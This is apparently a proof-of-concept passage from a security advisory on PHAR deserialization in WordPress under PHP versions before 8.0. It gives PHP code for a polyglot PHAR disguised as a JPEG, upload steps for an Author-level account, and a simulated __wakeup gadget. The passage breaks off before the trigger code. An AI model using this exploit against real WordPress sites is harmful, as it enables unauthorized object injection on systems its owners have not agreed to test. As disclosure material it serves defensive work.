Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0.

1. Create a PHAR file using the following PHP code in the `create_phar.php` file, and the command `php --define phar.readonly=0 create_phar.php`.


    class Evil {}

    // create new Phar
    $phar = new Phar('poc.phar');
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());

2. As an Author user, upload the `poc.phar.jpg` file. Note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).

3. Create a simulated gadget on the server with the following code:

    class Evil {
      function __wakeup() {
        die('Arbitrary deserialization');

4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):